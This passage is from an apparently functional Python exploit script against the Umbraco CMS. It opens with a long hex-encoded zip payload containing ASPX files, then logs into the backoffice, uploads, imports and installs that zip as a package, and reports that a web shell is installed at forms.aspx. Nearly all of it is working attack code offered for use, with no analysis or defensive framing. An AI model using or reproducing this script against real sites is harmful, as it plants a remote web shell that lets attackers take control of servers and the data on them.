    plugin += '\x74\xcb\x04\xe6\xc1\xfa\xa1\x72\x62\xbe\x9a\xe7\xd6\x1f\x11\x8d\xf4\xde\x64\xb4'
    plugin += '\x98\x87\x3c\x18\x7a\xfd\xc1\x30\x68\xd9\x05\x04\xf4\x4b\xe3\xde\x54\xf3\xc3\x01'
    plugin += '\x48\x6f\x59\x09\x08\xa5\x82\x97\x40\x94\x94\xf5\xb2\x5d\x64\x52\x6c\x13\x5e\xed'
    plugin += '\xd8\xa8\x08\x74\x19\x67\x79\xfa\x26\xfd\x61\xc6\xb0\xf9\xf2\xa7\xc7\xa3\xdf\x27'
    plugin += '\xf1\xae\x68\xfe\x0f\xa9\xfd\x3f\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00\x93\xad'
    plugin += '\x4d\x50\x14\x69\x60\x38\x7c\x04\x00\x00\x64\x0f\x00\x00\x30\x00\x20\x00\x63\x64'
    plugin += '\x34\x34\x63\x66\x33\x39\x2d\x33\x64\x37\x31\x2d\x34\x63\x31\x39\x2d\x62\x36\x65'
    plugin += '\x65\x2d\x39\x34\x38\x65\x31\x66\x61\x66\x30\x35\x32\x35\x2f\x66\x6f\x72\x6d\x73'
    plugin += '\x75\x2e\x61\x73\x70\x78\x55\x54\x0d\x00\x07\x46\xc3\x45\x5e\x66\xc3\x45\x5e\x65'
    plugin += '\xc3\x45\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\xd5\x57'
    plugin += '\x6d\x4f\xe3\x38\x10\xfe\xce\xaf\x30\x39\x21\xb5\xba\x36\x01\xed\x97\x15\xa4\xbd'
    plugin += '\xe3\x4a\xf7\x40\x5b\xa0\x82\xa2\xbd\x15\x45\x27\x37\x99\xb6\x39\x12\x3b\x6b\x3b'
    plugin += '\x2d\xb9\x15\xff\xfd\xc6\x76\x4a\x9a\xbe\x00\xbb\xe2\x56\x77\xf9\xd0\x3a\xe3\x99'
    plugin += '\x67\x66\x1e\x4f\xc6\xb6\xbf\xf7\x2b\xe9\xd3\x09\x90\x1e\x65\x93\x0c\x07\x2d\xa7'
    plugin += '\xf3\x93\x43\xf6\xda\x3b\x3e\xce\x9c\x25\x29\x17\x8a\x5c\xd0\x04\x64\x4a\x03\x9c'
    plugin += '\xbc\xce\xa5\x82\xc4\x3d\xbb\x34\x3a\x3b\xfe\xee\xc9\x65\x67\xf0\xb9\xdf\x25\x53'
    plugin += '\x95\xc4\xa4\x7f\xf3\x5b\xef\xac\x43\x9c\xa6\xe7\x7d\x7a\xd7\xf1\xbc\x93\xc1\x09'
    plugin += '\xf9\xe3\x74\x70\xde\x23\x07\xee\x3e\x19\x08\xca\x64\xa4\x22\xce\x68\xec\x79\xdd'
    plugin += '\x0b\x87\x38\x53\xa5\xd2\x43\xcf\x9b\xcf\xe7\xee\xfc\x9d\xcb\xc5\xc4\x1b\x5c\x79'
    plugin += '\x0f\x1a\xeb\x40\x1b\x17\xc3\xa6\x5a\xb2\x74\x43\x15\x3a\xda\xb5\x0c\x44\x94\x2a'
    plugin += '\x22\x32\x46\x55\xcb\x91\x20\x66\x20\x70\x82\xe0\x93\x8a\x68\x46\x15\x90\x80\x33'
    plugin += '\xa9\x88\x54\x22\x62\x13\x72\x7c\x33\x38\xfd\xd8\xfd\x4c\x5a\xc4\xb9\xbf\x77\x8e'
    plugin += '\xb6\x2b\x9e\x76\x8f\x4f\xba\x57\x5a\xcf\xd7\xee\xdb\x43\xe6\x4f\x81\x86\xfa\x5f'
    plugin += '\x45\x2a\x86\xf6\x38\x8a\x41\x1a\x22\x46\x82\xcf\xd1\xb3\xef\xd9\x09\xd4\x90\x2a'
    plugin += '\x8f\x81\xa8\x3c\x85\xd6\xd0\x51\xf0\xa0\xbc\x40\xca\xa1\xd3\xf6\x77\x9b\xcd\x21'
    plugin += '\x1b\xf1\x30\x6f\x28\x3a\x8a\xa1\x91\x36\x52\x01\x8d\x31\x17\x09\x89\x58\x9a\x29'
    plugin += '\x3b\x94\x10\x43\xa0\xc8\xd7\x21\x23\x63\xce\x54\x73\x4c\x93\x28\xce\x0f\xc9\xd0'
    plugin += '\xe9\x65\x41\x14\x52\xd2\xc1\x48\x79\x0c\x43\xa7\x41\x12\xce\xb8\x59\x96\xa3\x85'
    plugin += '\xb6\x8c\xfe\x86\x43\xf2\xfe\xfd\x1e\x4a\x1e\x87\xac\xd9\xd4\x11\x79\x26\xa4\xb6'
    plugin += '\xef\x2d\x92\xd0\x41\xe0\xff\x73\x14\x7c\xb8\xbc\x1c\x14\x14\x78\x85\x3a\xda\x5b'
    plugin += '\x32\xd0\xce\x18\x7a\x9e\x47\x7c\x99\x25\x09\x15\x79\xfb\x49\x52\x4e\x79\x6b\x73'
    plugin += '\x7e\x4a\x05\x4d\x08\xc3\x72\xd2\x0b\xc6\x42\xbd\x60\xbe\x67\xa4\x5b\xb4\x60\x45'
    plugin += '\x21\x15\x5c\x21\x41\x10\x92\x19\x8f\x42\x53\xba\x7f\xf6\x38\x0d\x6b\x7c\xf4\x97'
    plugin += '\x26\xce\xa2\x36\x48\x77\x06\x4c\x1d\x8b\x89\x24\x50\x37\x86\x5f\xcd\xaf\x7e\x94'
    plugin += '\xc8\x9f\xc6\xa5\x54\x3f\xd1\x98\xd4\xae\xe0\x4b\x06\x52\xb9\x7d\xed\x53\xde\x3a'
    plugin += '\x34\x53\xd3\x7b\xc8\x9d\x3b\xd2\x6a\x11\x96\xc5\x71\xbd\x62\x52\x05\xd0\xcf\x15'
    plugin += '\x7e\x2a\x48\x25\xb8\x9f\x44\xa4\xa0\x66\x8b\xa9\x7e\xf4\x92\x9e\x9a\x46\xd2\xfd'
    plugin += '\x1d\xd4\x4d\x1a\x63\x3a\xb8\xca\x4a\xf0\x58\xd6\xea\x2f\x5b\xda\xb5\xda\xa0\x27'
    plugin += '\x40\x65\x82\x55\xe5\x8f\x3b\xdf\x90\xf1\x6e\x6b\xf1\xd1\xfc\xdf\x93\x5e\x7e\x7b'
    plugin += '\x91\x00\x9e\x82\xa0\xba\xd9\x58\x0a\x5e\xb3\xe8\x2f\xc1\x60\xed\x38\x99\x49\xd2'
    plugin += '\xa9\xaf\x19\xaf\xc3\x7d\x0b\xa5\x1b\x74\x0d\xad\x96\xd3\x0f\xd8\xaa\x36\xf2\xb9'
    plugin += '\xc1\x6c\x2b\xa7\x8f\x6b\x12\x88\x25\xfc\xfb\x79\x38\x37\xec\x9e\xf1\x39\x23\x25'
    plugin += '\x95\x6f\x9a\x49\xf5\x6d\x2d\xa7\xff\x6a\x99\x97\x61\x97\xa3\x80\xaa\x60\x4a\x6a'
    plugin += '\xdd\x87\x00\x52\x4d\x14\x81\x87\xb2\xd0\xaa\x89\xbc\x26\x89\x15\x1d\x78\x70\xcf'
    plugin += '\x41\x4a\x6c\xb6\xcf\xeb\xad\x85\x6b\x03\x7c\xfc\x9e\x0d\x63\xb1\x2f\x15\x3b\xd2'
    plugin += '\x72\x39\xff\xd8\x86\x6e\x3b\x4a\x11\x87\xdb\x4d\x52\x95\xff\x90\x9e\xfa\x0a\xbf'
    plugin += '\xcb\x6f\x5b\x63\xd0\x9c\x49\xb7\xc3\x33\xa6\xb4\xf7\x83\x57\xfa\x75\x2e\x38\xd1'
    plugin += '\x07\x9d\xe2\x48\x02\xa1\xf3\x6c\xd6\xa7\x78\x92\xeb\x73\x3c\x13\x99\x35\x22\xd3'
    plugin += '\xea\x6b\x8b\x54\xa2\xb9\xdd\xbf\x3b\x5a\x21\x0d\x83\xd3\xde\x7a\xc0\x26\x6a\x8a'
    plugin += '\xfa\x55\x00\x57\x7f\x34\xb8\xa3\xdb\xe9\x6a\x20\xa3\x5c\xc1\xed\x1d\x19\x65\xe3'
    plugin += '\x31\x08\xb4\x64\x30\xb7\xb2\x12\xef\xae\x6a\xb1\x82\x7d\xa6\x8f\x5f\xd7\x4a\x00'
    plugin += '\x4d\xdc\x2b\x3c\x23\xd5\x2c\x54\x83\xec\x37\x96\x62\xaa\xaf\x44\xac\x4d\xcf\xd8'
    plugin += '\xd8\x92\x64\x06\xd6\xf5\x42\x5e\xd6\xc0\x34\x97\x51\x40\xe3\x3e\x35\x20\xcb\x18'
    plugin += '\x99\xd4\xa5\x5d\xd3\x26\xd6\xbf\x01\x2b\x86\x25\x9c\x15\xd4\x34\x00\x12\x91\x8c'
    plugin += '\x22\x06\xb5\x85\x57\xf7\x24\x12\xb8\x3c\x5c\xe4\xfa\x94\xde\x20\x46\x09\x7b\x8d'
    plugin += '\xb6\xd3\x92\xda\x4a\xb2\x0b\x79\xbd\xde\x30\xd8\xe7\x3c\x44\x76\x11\x5f\xa1\xe8'
    plugin += '\x85\xca\x28\x83\x2b\xbe\xf7\x25\xa2\xec\xd0\x7d\xe2\xea\x99\x52\x59\x14\x98\xa9'
    plugin += '\x0c\xbb\x2b\x56\xaa\xeb\xbb\xba\x5a\x01\x8a\x9d\x6a\xc0\xaf\xcd\x27\x53\x7b\x9b'
    plugin += '\x3e\x64\x44\x16\x5d\xe2\x59\x74\x31\x7a\x63\xa4\x95\x6e\xb7\x61\xb3\x58\x69\x7a'
    plugin += '\x85\x22\xde\x41\x52\xac\x94\x6a\x93\x28\x3b\xa3\x9d\x75\x7c\x73\xb7\x00\x16\x14'
    plugin += '\xf7\x92\x24\x8b\x55\x84\xa7\x6a\xe5\xe9\x89\x66\x48\x15\x1d\x3a\x84\x06\x9a\x63'
    plugin += '\x9c\xfe\xe5\x69\xbf\x6d\xd9\xe5\xc1\xc9\x04\xd4\x94\x87\x38\x99\x62\x2d\xe1\x7d'
    plugin += '\x66\x69\xbd\x8c\x97\x9f\xb5\x9b\x91\x68\x1f\x63\xa7\x23\x1f\x01\xaf\x2c\xbe\xb9'
    plugin += '\xd6\x2c\x5f\x85\x10\xc6\x9c\xea\x87\xa6\x1f\xa2\x92\xbe\x17\xa1\xcd\x36\xac\x7e'
    plugin += '\x0c\x54\x22\x27\x29\x04\xd1\x38\x27\xd4\x14\xe0\x2a\xb0\x96\x95\xc0\xf6\x0d\xd9'
    plugin += '\xdd\x06\x1b\x46\xb3\x76\x15\x40\x66\xa3\x24\xd2\xb1\xcd\x68\x9c\x69\xc1\x35\xde'
    plugin += '\x21\x0c\x86\xd6\xdd\x08\x62\x68\x6b\x3b\x4b\x4c\x17\xe5\xa7\x55\x8e\x8a\x5a\xc3'
    plugin += '\xd5\x37\x37\xd4\xf6\x3f\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00\x75\x1c\x56\x50'
    plugin += '\x70\x81\x61\x7a\x92\x03\x00\x00\x3c\x09\x00\x00\x30\x00\x00\x00\x63\x64\x34\x34'
    plugin += '\x63\x66\x33\x39\x2d\x33\x64\x37\x31\x2d\x34\x63\x31\x39\x2d\x62\x36\x65\x65\x2d'
    plugin += '\x39\x34\x38\x65\x31\x66\x61\x66\x30\x35\x32\x35\x2f\x70\x61\x63\x6b\x61\x67\x65'
    plugin += '\x2e\x78\x6d\x6c\xad\x56\xcd\x6e\x1b\x37\x10\xbe\x17\xe8\x3b\x4c\x74\xb6\xb4\x29'
    plugin += '\x7a\x31\x0c\x7a\x03\x35\x46\x00\x03\x49\x6a\xb4\x0a\x7a\x08\x72\xe0\x72\x47\x5a'
    plugin += '\xc6\x5c\x72\xc3\x1f\x6f\xf4\x6c\x3d\xf4\x91\xfa\x0a\x9d\xe1\xfe\x78\xa5\xb8\x29'
    plugin += '\xd0\x44\x17\x91\xc3\xf9\xf9\xf8\xcd\xc7\x91\xfe\xfe\xf3\x2f\xf1\xe2\x73\x6b\xe0'
    plugin += '\x01\x7d\xd0\xce\x5e\xaf\x7e\xda\x3c\x5f\x01\x5a\xe5\x6a\x6d\x0f\xd7\xab\x77\xbb'
    plugin += '\x57\xeb\xcb\x15\x84\x28\x6d\x2d\x8d\xb3\x78\xbd\xb2\x6e\xf5\xa2\xfc\xf1\x07\x91'
    plugin += '\xda\xea\x4e\xaa\x7b\x79\x40\xda\x01\x88\xbd\x36\x18\xf2\x92\x36\xcf\xd6\x6b\xf8'
    plugin += '\x25\x69\x53\x07\xe5\x75\x17\xa1\xd7\xc6\x80\xac\x6b\x60\x2f\x68\xd0\x23\x38\x0b'
    plugin += '\x75\xf2\x54\x05\x62\x83\x50\xb1\x33\x74\xde\x29\x0c\x01\xd6\xeb\x29\x11\xfb\x8f'
    plugin += '\x6b\xda\x1d\x92\xae\xcb\xbd\xf3\x6d\xd8\xc8\xd0\x7d\x16\x45\x36\xcc\xc7\xce\x1f'
    plugin += '\xee\x64\x6c\xca\xe2\x5d\x5b\x79\xa9\x9c\x28\x26\xcb\xd2\xe5\xad\x6c\xf1\x24\xc9'
    plugin += '\x64\x1b\x4b\x16\x8b\x9a\x43\xfd\x27\xea\xc7\xef\x02\x20\x7e\x03\x82\xea\xbb\x20'
    plugin += '\xa8\xbe\x01\x41\x3a\x43\xf0\xff\x10\xa4\xff\x42\x20\x8a\x47\x69\x09\x6d\xf7\x6e'
    plugin += '\x72\xe9\x16\xf2\xcb\x06\xcb\xf1\x63\x59\x78\xc5\xc9\x45\x61\x65\xbb\xf0\x18\x75'
    plugin += '\x5e\x5e\x6e\x7e\xde\x3c\x17\xc5\xb4\x9d\xcf\x8d\x56\x68\x03\x42\xf2\xe6\x7a\xd5'
    plugin += '\xc4\xd8\x85\xab\xa2\x48\x43\xc6\x8d\x72\x6d\x31\x3a\xac\xe6\x32\x2f\x5d\xdb\xa2'
    plugin += '\x57\x5a\x1a\x78\x3d\x9c\x89\xc9\xe9\x31\x2d\xa5\x2b\xe7\x6c\x8b\x6c\xa4\xf7\x3a'
    plugin += '\xa9\x18\x26\xe3\x3a\x33\x52\x88\x82\x03\xe6\x68\x8f\x9f\x92\xf6\xd8\xa2\x8d\x01'
    plugin += '\xe2\xb1\xa3\x47\x18\xa2\xd7\x2a\xae\x66\x1f\xf2\x6a\xe5\x47\xe7\xcb\x4b\x51\x0c'
    plugin += '\x8b\xe5\x89\xb6\x64\xa0\xeb\x0e\x8b\xc5\x49\x27\xa3\x6a\xf8\x64\x58\xcc\x15\x8b'
    plugin += '\x65\xc9\xb9\x23\xa7\x7c\x0b\x99\x62\xe3\xfc\xd3\xec\x9f\xf3\xde\x63\x15\x74\xc4'
    plugin += '\x99\x84\xbe\xef\x37\x0b\x22\x44\x31\x39\x4c\xb5\x64\x5a\x24\x27\x06\x64\x4d\xe9'
    plugin += '\xc4\xb3\xf7\x2f\x6f\xb6\xbb\xed\xfb\xc1\x3c\x5d\xa2\xdc\x35\xd2\xde\xc3\xd1\x25'
    plugin += '\x20\xfe\x40\x5b\x1a\x57\xc6\xf0\x64\x39\xd1\x02\xac\xf3\xa4\x89\xce\x19\x5a\xc8'
    plugin += '\x08\xad\xbc\xc7\x00\x8a\x92\x47\x76\x56\xce\x46\xa9\x22\xe4\x1e\x5c\xd0\x10\x8c'
    plugin += '\xfe\x38\x6c\x80\xa6\x1f\x7c\x4a\x18\x22\x89\xc5\x4a\x22\x26\xc0\xc7\x14\x22\xc8'
    plugin += '\x00\x28\xc3\x91\xbf\x53\xe0\x1c\x7f\x38\x5f\x6f\x88\xa9\x72\x89\x70\xb9\x7e\xfc'
    plugin += '\x9c\xdd\xe1\xf6\xcd\xdd\xaf\xbf\xed\xb6\x6f\x77\x57\xb0\x6b\x74\x98\x6e\x81\x7e'
    plugin += '\x98\x9d\x16\xb1\x86\xd6\xd5\x7a\x7f\x04\xaf\x0f\x0d\x2b\xc1\x11\x3a\x53\x93\x84'
    plugin += '\xaf\xa0\xa8\xb4\xbd\x80\x49\x46\x19\x2f\xdf\x95\x58\x25\x7a\xed\x5e\x1f\x2e\xce'
    plugin += '\x51\x10\xe4\x1e\x79\x28\x07\xa8\x10\xa8\x92\xeb\xb1\xe6\x9c\x99\x0f\xa2\x49\x56'
    plugin += '\x06\x19\x46\x4e\x54\x4b\xda\xcb\xc0\xec\x65\xf7\xca\xe4\x65\x87\x9e\x09\xca\x2e'
    plugin += '\x7b\xc7\x39\x32\x91\xd4\x8e\x03\x86\xab\xaf\xf1\x20\x92\x29\x97\xfb\xfc\xf6\xca'
    plugin += '\xdb\xe1\xd2\x39\xdf\xd0\xb3\x9b\xa9\x70\x50\x0d\xb6\x92\xdf\xd6\xd3\x71\xe8\xe3'
    plugin += '\x18\x12\x3a\x54\x7a\xaf\x15\xf5\x57\x79\x17\x86\x90\x2f\x42\xb6\x75\x7d\xee\x1f'
    plugin += '\x3d\xe2\xd7\xdc\x19\xd5\xa8\x87\xae\xa3\x37\x2e\x59\x0e\x4c\x03\x1f\x90\x40\x89'
    plugin += '\xab\x14\xa8\x61\x07\xef\x52\xf7\x45\x1e\x7a\xd4\xe6\xdf\xe9\xe8\xce\x6a\xde\xee'
    plugin += '\x59\xcf\x9e\x19\x6e\x75\xe0\x21\x15\x80\xb4\xed\xa8\x94\x87\x80\x91\x15\x4b\xdd'
    plugin += '\xc9\x0d\xe2\x0e\x13\x1c\xfe\x95\x8d\xcd\x00\xa6\x72\x0f\x38\xf5\xe1\x02\x7a\x86'
    plugin += '\xf7\x40\x43\x89\x73\x32\xe0\x14\x30\xfb\xb5\xd2\x26\x69\x26\xad\xd1\x7d\xe8\x3e'
    plugin += '\x7d\xa3\x55\xc3\x99\xe5\x83\xd4\x26\x77\xfa\x14\xda\xde\xbb\xa1\xe3\x81\x9e\x38'
    plugin += '\x18\x37\xf2\xc0\xa9\x6b\xd7\x5b\xe3\x64\xcd\x4a\x62\x11\x8f\x13\x23\x87\x6c\x4e'
    plugin += '\xc9\x58\x5e\xf8\xc3\x87\x52\x14\xe3\x1b\x1f\x26\xfe\x3c\xe6\xc5\x8d\x53\x89\xc7'
    plugin += '\xd0\x8e\xe6\x5e\x80\x62\x30\xee\xb0\xed\x08\xee\xa3\xe1\xf7\x78\x24\xb5\x36\x88'
    plugin += '\x71\x36\xbd\xc9\xdd\x9f\x76\x37\x5a\x31\x4a\xe9\x8f\xb7\x11\xdb\xd9\xfc\x9a\x18'
    plugin += '\x4a\x84\x70\x36\xb0\xde\x4e\x4a\x6d\x73\xdc\xb0\x15\xc5\xe2\x4f\xcf\x3f\x50\x4b'
    plugin += '\x01\x02\x14\x03\x14\x00\x00\x00\x00\x00\xa4\xad\x4d\x50\x00\x00\x00\x00\x00\x00'
    plugin += '\x00\x00\x00\x00\x00\x00\x25\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\xed\x41'
    plugin += '\x00\x00\x00\x00\x63\x64\x34\x34\x63\x66\x33\x39\x2d\x33\x64\x37\x31\x2d\x34\x63'
    plugin += '\x31\x39\x2d\x62\x36\x65\x65\x2d\x39\x34\x38\x65\x31\x66\x61\x66\x30\x35\x32\x35'
    plugin += '\x2f\x55\x54\x0d\x00\x07\x65\xc3\x45\x5e\x65\xc3\x45\x5e\x65\xc3\x45\x5e\x75\x78'
    plugin += '\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x14\x03\x14'
    plugin += '\x00\x00\x00\x08\x00\x23\x9c\x4b\x50\xb3\x1b\xf5\x0d\x81\x02\x00\x00\x15\x05\x00'
    plugin += '\x00\x2f\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa4\x81\x63\x00\x00\x00\x63'
    plugin += '\x64\x34\x34\x63\x66\x33\x39\x2d\x33\x64\x37\x31\x2d\x34\x63\x31\x39\x2d\x62\x36'
    plugin += '\x65\x65\x2d\x39\x34\x38\x65\x31\x66\x61\x66\x30\x35\x32\x35\x2f\x66\x6f\x72\x6d'
    plugin += '\x73\x2e\x61\x73\x70\x78\x55\x54\x0d\x00\x07\x73\x01\x43\x5e\x6f\xc3\x45\x5e\xd1'
    plugin += '\x01\x43\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b'
    plugin += '\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00\xd7\x9c\x4b\x50\x54\x54\x32\x42\x7a\x03'
    plugin += '\x00\x00\x72\x0f\x00\x00\x30\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa4\x81'
    plugin += '\x51\x03\x00\x00\x63\x64\x34\x34\x63\x66\x33\x39\x2d\x33\x64\x37\x31\x2d\x34\x63'
    plugin += '\x31\x39\x2d\x62\x36\x65\x65\x2d\x39\x34\x38\x65\x31\x66\x61\x66\x30\x35\x32\x35'
    plugin += '\x2f\x66\x6f\x72\x6d\x73\x74\x2e\x61\x73\x70\x78\x55\x54\x0d\x00\x07\xc6\x02\x43'
    plugin += '\x5e\x6f\xc3\x45\x5e\xc6\x02\x43\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04'
    plugin += '\xe8\x03\x00\x00\x50\x4b\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00\x96\xad\x4d\x50'
    plugin += '\x30\x5b\x39\xd8\x71\x06\x00\x00\x58\x1b\x00\x00\x30\x00\x20\x00\x00\x00\x00\x00'
    plugin += '\x00\x00\x00\x00\xa4\x81\x39\x07\x00\x00\x63\x64\x34\x34\x63\x66\x33\x39\x2d\x33'
    plugin += '\x64\x37\x31\x2d\x34\x63\x31\x39\x2d\x62\x36\x65\x65\x2d\x39\x34\x38\x65\x31\x66'
    plugin += '\x61\x66\x30\x35\x32\x35\x2f\x66\x6f\x72\x6d\x73\x62\x2e\x61\x73\x70\x78\x55\x54'
    plugin += '\x0d\x00\x07\x4d\xc3\x45\x5e\x66\xc3\x45\x5e\x65\xc3\x45\x5e\x75\x78\x0b\x00\x01'
    plugin += '\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x14\x03\x14\x00\x00\x00'
    plugin += '\x08\x00\x93\xad\x4d\x50\x14\x69\x60\x38\x7c\x04\x00\x00\x64\x0f\x00\x00\x30\x00'
    plugin += '\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa4\x81\x18\x0e\x00\x00\x63\x64\x34\x34'
    plugin += '\x63\x66\x33\x39\x2d\x33\x64\x37\x31\x2d\x34\x63\x31\x39\x2d\x62\x36\x65\x65\x2d'
    plugin += '\x39\x34\x38\x65\x31\x66\x61\x66\x30\x35\x32\x35\x2f\x66\x6f\x72\x6d\x73\x75\x2e'
    plugin += '\x61\x73\x70\x78\x55\x54\x0d\x00\x07\x46\xc3\x45\x5e\x66\xc3\x45\x5e\x65\xc3\x45'
    plugin += '\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02'
    plugin += '\x1f\x00\x14\x00\x00\x00\x08\x00\x75\x1c\x56\x50\x70\x81\x61\x7a\x92\x03\x00\x00'
    plugin += '\x3c\x09\x00\x00\x30\x00\x24\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x02\x13'
    plugin += '\x00\x00\x63\x64\x34\x34\x63\x66\x33\x39\x2d\x33\x64\x37\x31\x2d\x34\x63\x31\x39'
    plugin += '\x2d\x62\x36\x65\x65\x2d\x39\x34\x38\x65\x31\x66\x61\x66\x30\x35\x32\x35\x2f\x70'
    plugin += '\x61\x63\x6b\x61\x67\x65\x2e\x78\x6d\x6c\x0a\x00\x20\x00\x00\x00\x00\x00\x01\x00'
    plugin += '\x18\x00\xc5\xcf\xc8\xc6\x28\xe9\xd5\x01\x71\xf7\xc8\xc6\x28\xe9\xd5\x01\xf3\x97'
    plugin += '\x19\xa6\x28\xe9\xd5\x01\x50\x4b\x05\x06\x00\x00\x00\x00\x06\x00\x06\x00\xec\x02'
    plugin += '\x00\x00\xe2\x16\x00\x00\x00\x00'
    return plugin

def exploit(e_mail,password,target):
    sku_version = "version8"

    headers = {
    "User-Agent" : "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
    "Accept": "application/json, text/plain, */*",
    "Accept-Language": "q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding": "gzip, deflate"
    }

    s = requests.Session()

    print "\033[91m(+) Phase 1: Project site authentication\033[0m"
    url_auth = target + "backoffice/UmbracoApi/Authentication/PostLogin"
    json_login = {"username":e_mail,"password":password}
    r8 = s.post(url_auth,json=json_login,headers=headers,verify=False)
    print "(+++) RESPONSE STATUS: %s" % r8.status_code
    print r8.content
    print(s.cookies.get_dict())
    token = s.cookies["UMB-XSRF-TOKEN"]
    headers['X-UMB-XSRF-TOKEN'] = token

    print "\033[91m(+) Phase 2: Upload package\033[0m"
    url_upload = target + "backoffice/UmbracoApi/PackageInstall/UploadLocalPackage"

    files = { 'file' : ('forms.zip', zippedPlugin()) }
    
    r9 = s.post(url_upload,headers=headers,verify=False,files=files)


    print "(+++) RESPONSE STATUS: %s" % r9.status_code
    r9data = r9.content.replace(')]}\',','')
    data = json.loads(r9data)
    packageGuid = data['packageGuid']
    zipFileName = data['zipFileName']
    print "\033[93m(+) Phase 2: Upload package - packageGuid: %s\033[0m" % packageGuid
    print "\033[93m(+) Phase 2: Upload package - zipFileName: %s\033[0m" % zipFileName

    print "\033[91m(+) Phase 3: Import package\033[0m"
    url_import = target + "backoffice/UmbracoApi/PackageInstall/Import"
    r10 = s.post(url_import,headers=headers,json=data,verify=False)
    #r10 = s.post(url_import,headers=headers,json=data,verify=False)
    print "(+++) RESPONSE STATUS: %s" % r10.status_code
    print r10.content

    print "\033[91m(+) Phase 4: Install package\033[0m"
    url_install = target + "backoffice/UmbracoApi/PackageInstall/InstallFiles"
    json_install = {"id":1,"packageGuid":packageGuid,"zipFileName":zipFileName,"isRestarting":"false"}
    r11 = s.post(url_install,headers=headers,json=json_install,verify=False)
    #r11 = s.post(url_install,headers=headers,json=json_install,verify=False)
    print "(+++) RESPONSE STATUS: %s" % r11.status_code

    if  r11.status_code == 200:
        print "\033[94m(+) ============================================\033[0m"
        print "\033[94m(+) =======              WIN             =======\033[0m"
        print "\033[94m(+) ============================================\033[0m"
        print "\033[91m(+) Webshell succesfully installed!!!\033[0m"
        print "\033[91m(+) Visit:\033[0m \033[94m" + target + "forms.aspx\033[0m"

    else:
        print "\033[91m(+) Exploit failed\033[0m"


if __name__ == "__main__":

    if len(sys.argv) != 1:
       print "(+) usage: python %s" % sys.argv[0]
       print "(+) i.e: python %s" % sys.argv[0]
       sys.exit(-1)
    
    #######UPDATE THIS############
    target = 'http://localhost:4444/umbraco/'
    e_mail = "admin2@localhost.com"
    password = "adminpassword"
    ##############################

    exploit(e_mail,password,target)